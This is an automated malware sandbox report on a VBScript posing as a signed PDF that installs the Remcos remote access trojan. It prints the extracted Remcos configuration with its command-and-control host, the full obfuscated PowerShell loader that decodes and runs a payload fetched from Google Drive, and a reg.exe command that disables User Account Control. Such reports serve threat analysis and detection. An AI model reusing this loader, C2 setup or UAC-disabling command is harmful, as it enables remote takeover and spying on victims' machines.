Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
29-11-2024 09:16
Static task
static1
Behavioral task
behavioral1
Sample
30180908_signedpdf.vbs
Resource
win7-20240903-en
General
-
Target
30180908_signedpdf.vbs
-
Size
33KB
-
MD5
33788adfb67a0e0bf5a5fe58cb9c5617
-
SHA1
a62c45afa541fdcccc5c97c432c78ce55b0a7a5b
-
SHA256
609aaa35ee7b0582cb3e1e4e9f76d647c98377dac62eca602bf318578b61576f
-
SHA512
9da759eba3eee9ed6d1b804ed8d26f1f59831d49543e393b6adf462343d98dbefabc0314c673b31a4c52857e0d975edbb8304c0e1ee7a375fd71f446ab655a50
-
SSDEEP
768:WuEasaYzR+s1z3NkQpyhZ6d4nl3pVVCStrppuAP:zEasd+a3iQpy/V3/UStF3P
Malware Config
Extracted
remcos
RemoteHost
8766e34g8.duckdns.org:3782
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
true
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-93TSMD
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Processes:
reg.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Blocklisted process makes network request 64 IoCs
Processes:
WScript.exepowershell.exemsiexec.exeflow pid Process 2 4032 WScript.exe 13 2512 powershell.exe 16 2512 powershell.exe 25 5108 msiexec.exe 27 5108 msiexec.exe 29 5108 msiexec.exe 31 5108 msiexec.exe 33 5108 msiexec.exe 44 5108 msiexec.exe 48 5108 msiexec.exe 50 5108 msiexec.exe 52 5108 msiexec.exe 53 5108 msiexec.exe 54 5108 msiexec.exe 55 5108 msiexec.exe 56 5108 msiexec.exe 57 5108 msiexec.exe 58 5108 msiexec.exe 59 5108 msiexec.exe 60 5108 msiexec.exe 61 5108 msiexec.exe 62 5108 msiexec.exe 63 5108 msiexec.exe 64 5108 msiexec.exe 65 5108 msiexec.exe 66 5108 msiexec.exe 67 5108 msiexec.exe 68 5108 msiexec.exe 69 5108 msiexec.exe 70 5108 msiexec.exe 71 5108 msiexec.exe 72 5108 msiexec.exe 73 5108 msiexec.exe 76 5108 msiexec.exe 77 5108 msiexec.exe 78 5108 msiexec.exe 79 5108 msiexec.exe 80 5108 msiexec.exe 81 5108 msiexec.exe 82 5108 msiexec.exe 83 5108 msiexec.exe 84 5108 msiexec.exe 85 5108 msiexec.exe 86 5108 msiexec.exe 87 5108 msiexec.exe 88 5108 msiexec.exe 89 5108 msiexec.exe 92 5108 msiexec.exe 94 5108 msiexec.exe 95 5108 msiexec.exe 96 5108 msiexec.exe 97 5108 msiexec.exe 98 5108 msiexec.exe 99 5108 msiexec.exe 100 5108 msiexec.exe 101 5108 msiexec.exe 102 5108 msiexec.exe 105 5108 msiexec.exe 106 5108 msiexec.exe 108 5108 msiexec.exe 109 5108 msiexec.exe 110 5108 msiexec.exe 111 5108 msiexec.exe 112 5108 msiexec.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Processes:
powershell.exepowershell.exepid Process 4976 powershell.exe 2512 powershell.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
msiexec.exepid Process 5108 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exemsiexec.exepid Process 4976 powershell.exe 5108 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exemsiexec.execmd.exereg.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid Process 2512 powershell.exe 2512 powershell.exe 4976 powershell.exe 4976 powershell.exe 4976 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid Process 4976 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 2512 powershell.exe Token: SeDebugPrivilege 4976 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
msiexec.exepid Process 5108 msiexec.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
WScript.exepowershell.exemsiexec.execmd.exedescription pid Process procid_target PID 4032 wrote to memory of 2512 4032 WScript.exe 85 PID 4032 wrote to memory of 2512 4032 WScript.exe 85 PID 4976 wrote to memory of 5108 4976 powershell.exe 101 PID 4976 wrote to memory of 5108 4976 powershell.exe 101 PID 4976 wrote to memory of 5108 4976 powershell.exe 101 PID 4976 wrote to memory of 5108 4976 powershell.exe 101 PID 5108 wrote to memory of 1424 5108 msiexec.exe 105 PID 5108 wrote to memory of 1424 5108 msiexec.exe 105 PID 5108 wrote to memory of 1424 5108 msiexec.exe 105 PID 1424 wrote to memory of 3996 1424 cmd.exe 107 PID 1424 wrote to memory of 3996 1424 cmd.exe 107 PID 1424 wrote to memory of 3996 1424 cmd.exe 107
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\30180908_signedpdf.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Amtsraadet='Folklorens';;$Bellyaching='Belnningssystem';;$Prereview='Professionally';;$Ostensiv='Vesiculiferous';;$Syvkanterne=$host.Name;function Refunderer($Bovlam){If ($Syvkanterne) {$Erhvervsgeografi=4} for ($Motocrossene=$Erhvervsgeografi;;$Motocrossene+=5){if(!$Bovlam[$Motocrossene]) { break };$Fordummelsen+=$Bovlam[$Motocrossene];$Chirm='Scrawm'}$Fordummelsen}function Eksercitsens($logicism){ .($Artiskokhjerte) ($logicism)}$Ruidoso=Refunderer 'Biksnunb eOpbetZai..InstW';$Ruidoso+=Refunderer 'FiliE,rytbW dmCFir LTissIKilne Quan HalT';$Ersar=Refunderer 'NoncMBuf.oA,eazI pei .telfiltlCorraIntr/';$Allocatur=Refunderer 'hypeTAntil AfbsJera1,uck2';$Passerens='Kirc[E tenAynaEUnultPane. L.tSGl be OvarB.ceVUnquIAab CN tiECo tpMicrO B.nIafh NSykltOvermLilla M lNu puaSamfGWassEMeniR D.t]Pr s:Tard:SporST,stEH emcA teu A,brNotoiTaentPat YAlloP erR CaloRe eT UnpoD stCy.miOrefaL onm=Isch$TapeADri lElytLFizzO ejCHalvAA rit lamuVer R';$Ersar+=Refunderer 'Snou5.alo.Insi0Dedu bur (CirkWFe.tiBecrn PaldyachoPj ewAktis.lip rbiNB oaTHo e Repr1Hino0Sejl.Svul0frar; Hjt Min WHyp,iHidfnMari6topp4Skid;,yst Ha,xSlan6Excr4 Ura;chan T,terR fev N g:mngd1Nykr3Spi 1Tau...pir0Dags) ain TautGDampe unccKul.kMegaoRe,u/ Sju2kyss0Lock1Hemi0Poli0De a1Tema0Abo 1 Fid LuncF PhoiPy irGesje Spef,ndoo ilbx ver/Sund1Sta 3 Syv1Dise.Pa h0';$Sarongers=Refunderer 'Wri U OmbSBalleclavrSy a-EtatABibeg uleBelen Efft';$manometeret=Refunderer 'AcuahVenlt R gtAfhnpbphesH.nd: Rc /Boha/AfledF larBusfigiftvPulveAftn.Undeg eloArbeoPiblg Noml.urre ene.AmfecKrydo Skam fbr/An.uuMenuccal ?NeomePhonxRestpTabloT turPlayt ffr=Un edLacto marwMispnO palKa loAffaa WhedHypn&CaliiDoc,dFore=Mona1DemojByldDParezP.laZprot3SeksH tetJAsseHUm rVOp erR,tevTricr EquGVensU A ajEryt9Slve0p,ecjNeurWTjur7 FaikTw.nx A hCgymnSSpleqTe.rlBiopdSt.fv .er0HankJSponeUndeJ';$Justitsministerium=Refunderer 'Orga>';$Artiskokhjerte=Refunderer 'LongiP,ace ,asX';$Skotjsarbejders='Concomitants';$Bogging='\Superspecialists.Won';Eksercitsens (Refunderer 'V la$Unp.GDepeL A,rOUndeBNittAL gnLTran: ndmDekoLArmoK HalENonat DepAAfsknIn.vD An,=Inte$ .emeG,arn,edmvUhyg:Sur,AUharP ,efP Vitd OmfATrilTKrigAKu.s+Peri$.astbBr loA eugA rbgU geIPyranExciG');Eksercitsens (Refunderer 'Sche$ima g Pull ortounm BFjsia GamlPyn : DisITwisnDekadUdgaFUntaL da.YBolltPa.cTde ke ChetDard= na $ bunmSti aAntanEtagOBa dmPerieU esT ForE algrBo eESnaptIrid.ResksNavnpRa tl AryI PubtOpma(phan$P.daJ RemuSlassPh sTWrotIAfriTSe isSem MAflsiVulvNRebsISlodSS miTDispe To.RIndii SplU Fram Fil)');Eksercitsens (Refunderer $Passerens);$manometeret=$Indflyttet[0];$karrooers=(Refunderer 'hal.$antigUnbrllivsoFrucBFrisaForrlanst:SelvuM siS Nobl,ammISy vN onoGDisp=BrobNDobbEFamoW nyb-TjenoLaryBClooJOvereMethC PhatNota MotisAlb ypeloS Feft ageOverMTyng. am$,itarAgeiUTopoI Metd HypoLseks LeuO');Eksercitsens ($karrooers);Eksercitsens (Refunderer 'Nuse$,akkUDalaso fil SuriI ran jergK id.P.tiHWe,geSam a ,ykdVaageCli,rBarbsSvej[Supr$ oenSAssaaHabirDunboCoupnberegposte LagrD spsNonp] all=vend$.esgEStaprTuvasMiteaRewar');$Variationerne=Refunderer 'L ve$,onaUGodbsdekol igaiAf anHellgReat. br.D Nedo Pl wOutfnTr,olGan oVoksa,guadSpirFIn fi.dvil KvaeR.to(Hvs $pan.mRenhaOut n S voContmEndeeFa,stUn,oeDeltr,odle FattDypp,Konf$ForsAHa daRosen Uvod Ad ePithmFle,aP otn Spae nidrResheov r)';$Aandemanere=$mlketand;Eksercitsens (Refunderer 'Pala$ JaiG Su.l,tdlOLegeb EleaProxLb nd: ,loFTr,pADeselLodgkSnape ctoJLophA RelgQuintyamaeAfbenOrv.sSlag=Udvi( UdkTStereSsonsUda Tm,rs-RecepBus.AGre TEkskhS mm Blaf$Hatta FirA Gu,n,inddRa,tEerytmVersA papn Cowe asrArbeeReso)');while (!$Falkejagtens) {Eksercitsens (Refunderer 'Gr,d$Rec gFer lInaloInteb vrda AnslFyr :S,mmNSpasoPartbM.tto EnjdS opiUnpue M tsVej =Thir$ TilSS.utpTerpnR ovdBe liPr vnPicega tosKa,cfT,faeBe ijMa clInscsbe n2Hypn4C nt7') ;Eksercitsens $Variationerne;Eksercitsens (Refunderer 'ProwsBerdTIr,eaSpdbR uacTIn.v-UdensSyn.LGrunE leeLo,ap For E is4');Eksercitsens (Refunderer 'Int $DesiG PatlFoulo ommbUdflaKeraLHack:Pa,aFochlA ympLFilrKDr ee .agJ .ksANon,g KletArtie teaNProgs Non=P pi(C.rct Di eAdsksCou T and-Altip eiALiketTordh og ver$Afara harATat,NBraidSamaE endMOxygAWatsnKnokEShinRAlmieGela)') ;Eksercitsens (Refunderer 'H nd$Enfug tenlRea,OHandBdkmaathe LNonn:WhimMDumpa rkanAnemDMindiAngr1jouk6finn8Emac=Sy.h$ NemGTyveL graoSnudbSinta MeslMile:SyphAEye.LSkimTBaryEProcRHairN erve Ev rPhoreArbeSRdkl+Conv+ Pop%Prag$Not,i elunSoleD laffSna l ediyHje.tUdryTStraEForttKn r.PhotcCakaoSterUNon nsildt') ;$manometeret=$Indflyttet[$Mandi168]}$Foranalysers=297459;$Opmarchomraaderne=30173;Eksercitsens (Refunderer ' vik$Tve.G Eg lRegnOOpbebBenhAaborL Hy.: Bl,eRhi f asstDobbe ManrKnivkHarnR udsisannG,ikeSBorotNonrIChardTaleE iber komnLichESchi2,all7,eev Pron=Bibe AlleGAktieForeTFals-GentC EpioFlauN enmT TaleVgten BegtS,bh bro $TrreaSkina Ka.N,orpD rsmE Fr mUdmnA truN OveeUnfrREdite');Eksercitsens (Refunderer ' lfr$Arbag D elUndeoSkotbTh ma WailBars:ContfUkral ndeiTe et GultKlineForerPasegIlluuExc,lSkmtdPlet Ndbr=Disi rel[StrmS apy CresExpltUliveSpelmHasl.RetiCRe poAtmon AdrvBegiePilorOvert Cou] ekl:Ove :BrooFUndir.exfoRentmSolsBRegeaInt,sUmble Ufo6Kapi4 ottS S itBesirtangiBoo,nOmdag Unc(Hiru$AarsE .etfLandtCivie Star SmlkCo rrph li FasgR.spsTiskt emi maad M reStabrManin FrueAdfr2Blu,7I,dv)');Eksercitsens (Refunderer 'Tvek$Tetrg harlUdvaoOverB.kolaBoykl ost:BjrgbSulfAKareDSigtEtilln.ythi AssCbe khUdreETepiRRaak Spec=Frem Aut[Ud.eSto cyTreesCyliTCec.eLngemVerm.SortTTeemeHummxcatttS be.ForbePreinS.olC Ba.O I ldIncoIKin nEcidGTup.]Husl: ndt:.mugaSalmsSa.iCProlIRedaiPrep.C rogDisteScabTMic,sNgletHaarrFiggiStabnPiceGMund(Folk$QualFBrugLH odiDebotKntrTSendeJo dr boggfuldUAandL,engdCato)');Eksercitsens (Refunderer 'Unde$ atgFel.l Parod.ssbHarea ittlLand:ScalP Ba ETuckTProbR BigOBr nN exe.ubelUdklLTrigaAcu,=Orni$SeisbHjeraE,brD orueE ytnSkipiOutrCUlemHP,nsE Conr Fr .SapoSUdt uTillbDaghS Sh.TPingROeveISaa,NOmbyGMeth(Unme$Agg,fMerlOP.etR Shoa TypN.ncoaDrmmLSle YFingsDataebantrIntesB aa,Morf$UnoeoCottPN,dsm SemADegeRLeawCKu uHLintOSupemJewhrFrotAov rA SerdApteeSkorRFettNRmn eFaci)');Eksercitsens $Petronella;"2⤵
- Blocklisted process makes network request
- Network Service Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2512
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Amtsraadet='Folklorens';;$Bellyaching='Belnningssystem';;$Prereview='Professionally';;$Ostensiv='Vesiculiferous';;$Syvkanterne=$host.Name;function Refunderer($Bovlam){If ($Syvkanterne) {$Erhvervsgeografi=4} for ($Motocrossene=$Erhvervsgeografi;;$Motocrossene+=5){if(!$Bovlam[$Motocrossene]) { break };$Fordummelsen+=$Bovlam[$Motocrossene];$Chirm='Scrawm'}$Fordummelsen}function Eksercitsens($logicism){ .($Artiskokhjerte) ($logicism)}$Ruidoso=Refunderer 'Biksnunb eOpbetZai..InstW';$Ruidoso+=Refunderer 'FiliE,rytbW dmCFir LTissIKilne Quan HalT';$Ersar=Refunderer 'NoncMBuf.oA,eazI pei .telfiltlCorraIntr/';$Allocatur=Refunderer 'hypeTAntil AfbsJera1,uck2';$Passerens='Kirc[E tenAynaEUnultPane. L.tSGl be OvarB.ceVUnquIAab CN tiECo tpMicrO B.nIafh NSykltOvermLilla M lNu puaSamfGWassEMeniR D.t]Pr s:Tard:SporST,stEH emcA teu A,brNotoiTaentPat YAlloP erR CaloRe eT UnpoD stCy.miOrefaL onm=Isch$TapeADri lElytLFizzO ejCHalvAA rit lamuVer R';$Ersar+=Refunderer 'Snou5.alo.Insi0Dedu bur (CirkWFe.tiBecrn PaldyachoPj ewAktis.lip rbiNB oaTHo e Repr1Hino0Sejl.Svul0frar; Hjt Min WHyp,iHidfnMari6topp4Skid;,yst Ha,xSlan6Excr4 Ura;chan T,terR fev N g:mngd1Nykr3Spi 1Tau...pir0Dags) ain TautGDampe unccKul.kMegaoRe,u/ Sju2kyss0Lock1Hemi0Poli0De a1Tema0Abo 1 Fid LuncF PhoiPy irGesje Spef,ndoo ilbx ver/Sund1Sta 3 Syv1Dise.Pa h0';$Sarongers=Refunderer 'Wri U OmbSBalleclavrSy a-EtatABibeg uleBelen Efft';$manometeret=Refunderer 'AcuahVenlt R gtAfhnpbphesH.nd: Rc /Boha/AfledF larBusfigiftvPulveAftn.Undeg eloArbeoPiblg Noml.urre ene.AmfecKrydo Skam fbr/An.uuMenuccal ?NeomePhonxRestpTabloT turPlayt ffr=Un edLacto marwMispnO palKa loAffaa WhedHypn&CaliiDoc,dFore=Mona1DemojByldDParezP.laZprot3SeksH tetJAsseHUm rVOp erR,tevTricr EquGVensU A ajEryt9Slve0p,ecjNeurWTjur7 FaikTw.nx A hCgymnSSpleqTe.rlBiopdSt.fv .er0HankJSponeUndeJ';$Justitsministerium=Refunderer 'Orga>';$Artiskokhjerte=Refunderer 'LongiP,ace ,asX';$Skotjsarbejders='Concomitants';$Bogging='\Superspecialists.Won';Eksercitsens (Refunderer 'V la$Unp.GDepeL A,rOUndeBNittAL gnLTran: ndmDekoLArmoK HalENonat DepAAfsknIn.vD An,=Inte$ .emeG,arn,edmvUhyg:Sur,AUharP ,efP Vitd OmfATrilTKrigAKu.s+Peri$.astbBr loA eugA rbgU geIPyranExciG');Eksercitsens (Refunderer 'Sche$ima g Pull ortounm BFjsia GamlPyn : DisITwisnDekadUdgaFUntaL da.YBolltPa.cTde ke ChetDard= na $ bunmSti aAntanEtagOBa dmPerieU esT ForE algrBo eESnaptIrid.ResksNavnpRa tl AryI PubtOpma(phan$P.daJ RemuSlassPh sTWrotIAfriTSe isSem MAflsiVulvNRebsISlodSS miTDispe To.RIndii SplU Fram Fil)');Eksercitsens (Refunderer $Passerens);$manometeret=$Indflyttet[0];$karrooers=(Refunderer 'hal.$antigUnbrllivsoFrucBFrisaForrlanst:SelvuM siS Nobl,ammISy vN onoGDisp=BrobNDobbEFamoW nyb-TjenoLaryBClooJOvereMethC PhatNota MotisAlb ypeloS Feft ageOverMTyng. am$,itarAgeiUTopoI Metd HypoLseks LeuO');Eksercitsens ($karrooers);Eksercitsens (Refunderer 'Nuse$,akkUDalaso fil SuriI ran jergK id.P.tiHWe,geSam a ,ykdVaageCli,rBarbsSvej[Supr$ oenSAssaaHabirDunboCoupnberegposte LagrD spsNonp] all=vend$.esgEStaprTuvasMiteaRewar');$Variationerne=Refunderer 'L ve$,onaUGodbsdekol igaiAf anHellgReat. br.D Nedo Pl wOutfnTr,olGan oVoksa,guadSpirFIn fi.dvil KvaeR.to(Hvs $pan.mRenhaOut n S voContmEndeeFa,stUn,oeDeltr,odle FattDypp,Konf$ForsAHa daRosen Uvod Ad ePithmFle,aP otn Spae nidrResheov r)';$Aandemanere=$mlketand;Eksercitsens (Refunderer 'Pala$ JaiG Su.l,tdlOLegeb EleaProxLb nd: ,loFTr,pADeselLodgkSnape ctoJLophA RelgQuintyamaeAfbenOrv.sSlag=Udvi( UdkTStereSsonsUda Tm,rs-RecepBus.AGre TEkskhS mm Blaf$Hatta FirA Gu,n,inddRa,tEerytmVersA papn Cowe asrArbeeReso)');while (!$Falkejagtens) {Eksercitsens (Refunderer 'Gr,d$Rec gFer lInaloInteb vrda AnslFyr :S,mmNSpasoPartbM.tto EnjdS opiUnpue M tsVej =Thir$ TilSS.utpTerpnR ovdBe liPr vnPicega tosKa,cfT,faeBe ijMa clInscsbe n2Hypn4C nt7') ;Eksercitsens $Variationerne;Eksercitsens (Refunderer 'ProwsBerdTIr,eaSpdbR uacTIn.v-UdensSyn.LGrunE leeLo,ap For E is4');Eksercitsens (Refunderer 'Int $DesiG PatlFoulo ommbUdflaKeraLHack:Pa,aFochlA ympLFilrKDr ee .agJ .ksANon,g KletArtie teaNProgs Non=P pi(C.rct Di eAdsksCou T and-Altip eiALiketTordh og ver$Afara harATat,NBraidSamaE endMOxygAWatsnKnokEShinRAlmieGela)') ;Eksercitsens (Refunderer 'H nd$Enfug tenlRea,OHandBdkmaathe LNonn:WhimMDumpa rkanAnemDMindiAngr1jouk6finn8Emac=Sy.h$ NemGTyveL graoSnudbSinta MeslMile:SyphAEye.LSkimTBaryEProcRHairN erve Ev rPhoreArbeSRdkl+Conv+ Pop%Prag$Not,i elunSoleD laffSna l ediyHje.tUdryTStraEForttKn r.PhotcCakaoSterUNon nsildt') ;$manometeret=$Indflyttet[$Mandi168]}$Foranalysers=297459;$Opmarchomraaderne=30173;Eksercitsens (Refunderer ' vik$Tve.G Eg lRegnOOpbebBenhAaborL Hy.: Bl,eRhi f asstDobbe ManrKnivkHarnR udsisannG,ikeSBorotNonrIChardTaleE iber komnLichESchi2,all7,eev Pron=Bibe AlleGAktieForeTFals-GentC EpioFlauN enmT TaleVgten BegtS,bh bro $TrreaSkina Ka.N,orpD rsmE Fr mUdmnA truN OveeUnfrREdite');Eksercitsens (Refunderer ' lfr$Arbag D elUndeoSkotbTh ma WailBars:ContfUkral ndeiTe et GultKlineForerPasegIlluuExc,lSkmtdPlet Ndbr=Disi rel[StrmS apy CresExpltUliveSpelmHasl.RetiCRe poAtmon AdrvBegiePilorOvert Cou] ekl:Ove :BrooFUndir.exfoRentmSolsBRegeaInt,sUmble Ufo6Kapi4 ottS S itBesirtangiBoo,nOmdag Unc(Hiru$AarsE .etfLandtCivie Star SmlkCo rrph li FasgR.spsTiskt emi maad M reStabrManin FrueAdfr2Blu,7I,dv)');Eksercitsens (Refunderer 'Tvek$Tetrg harlUdvaoOverB.kolaBoykl ost:BjrgbSulfAKareDSigtEtilln.ythi AssCbe khUdreETepiRRaak Spec=Frem Aut[Ud.eSto cyTreesCyliTCec.eLngemVerm.SortTTeemeHummxcatttS be.ForbePreinS.olC Ba.O I ldIncoIKin nEcidGTup.]Husl: ndt:.mugaSalmsSa.iCProlIRedaiPrep.C rogDisteScabTMic,sNgletHaarrFiggiStabnPiceGMund(Folk$QualFBrugLH odiDebotKntrTSendeJo dr boggfuldUAandL,engdCato)');Eksercitsens (Refunderer 'Unde$ atgFel.l Parod.ssbHarea ittlLand:ScalP Ba ETuckTProbR BigOBr nN exe.ubelUdklLTrigaAcu,=Orni$SeisbHjeraE,brD orueE ytnSkipiOutrCUlemHP,nsE Conr Fr .SapoSUdt uTillbDaghS Sh.TPingROeveISaa,NOmbyGMeth(Unme$Agg,fMerlOP.etR Shoa TypN.ncoaDrmmLSle YFingsDataebantrIntesB aa,Morf$UnoeoCottPN,dsm SemADegeRLeawCKu uHLintOSupemJewhrFrotAov rA SerdApteeSkorRFettNRmn eFaci)');Eksercitsens $Petronella;"1⤵
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5108 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3996
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD5317cbb34bcb025a3146a92a570f9bec5
SHA11daa7ad2e70b32115377654e7d8249d1d060c67c
SHA256ceb7d7bcc9317b7e18e38e74deac3cccd45a0080cbee74f6c95bdcc6a1da852f
SHA512c27fbb7d6dbcdd44d51a7ca615cab61273ce35ab8d86f35c17783ae14fbff8a5646421ffd4ffa4d4d9877972f78b47c7c50fa221d1dabfa68c21ca494660216b
-
Filesize
1KB
MD5d336b18e0e02e045650ac4f24c7ecaa7
SHA187ce962bb3aa89fc06d5eb54f1a225ae76225b1c
SHA25687e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27
SHA512e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
426KB
MD58a3cfa45f3daf3318ee35fbc24637ccd
SHA1a4a2f7a664f7839ede5e3a38cd303c50ac4db90d
SHA25613345dbc875ba768cb21aadf3b3127c0cd7b9278f1460f8bac7b2c382ac6bc6d
SHA512a35d23894c58a3613fee2426974a2626ecdc410d254055a3a704f03ed54f64162bde5be672c4f706039f810e125610fb62ed941df6f4f4fa51ba9da12299e111